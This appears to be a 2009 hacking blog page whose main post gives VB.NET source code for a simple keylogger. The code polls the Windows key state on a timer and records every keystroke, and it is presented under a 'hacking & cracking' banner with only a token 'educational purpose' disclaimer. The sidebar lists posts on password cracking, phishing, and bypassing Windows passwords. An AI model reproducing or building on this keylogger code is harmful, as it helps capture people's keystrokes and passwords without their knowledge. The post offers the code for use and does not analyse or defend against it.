Coding, Programming examples using amazing small applications only for educational purpose.
All Developing, Hacking & Cracking Codes with Bots
-
▼
2009
(57)
-
▼
March
(21)
- Password Cracking Program code
- Keylogger Programming
- Auto Typer Programming code
- Speed up your Internet speed by 20%
- Dont Display Recent Opened Documents in Start Menu
- How to Hide the drives (c:,d:,e:,...etc) in from y...
- Remove Thumb.db file
- Bypass Passwords in Windows
- Speed Up Windows Vista with a USB Thumb Drive
- Open command prompt from where it is Banned
- Proxy ?? its all hereFinding and Using Anonymous P...
- Enable Right Clicks on The Sites That Disable it
- My PC/Laptop/Computer Hangs / Freezes Up - What to...
- How to make a phisher
- Places that viruses and trojans hide on start up
- How to access the restricted or banned websites?
- How to get someone's IP
- ENTER ANY PORN WEBSITE VIP SECTION WITHOUT PASWD
- ALL PHISPERS
- Tips for Tracing An E-mail
- auto clicker,typer,ptc,media playr,notepad,shutdn,...
-
▼
March
(21)
Monday, March 2
Keylogger Programming
//Keylogger Programming//
Public Class Form6
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Long) As_ Integer
Private Sub Form6_Load(ByVal sender As System.Object, ByVal e As_ System.EventArgs) Handles MyBase.Load
Timer1.Start()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As_ System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
End Class
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment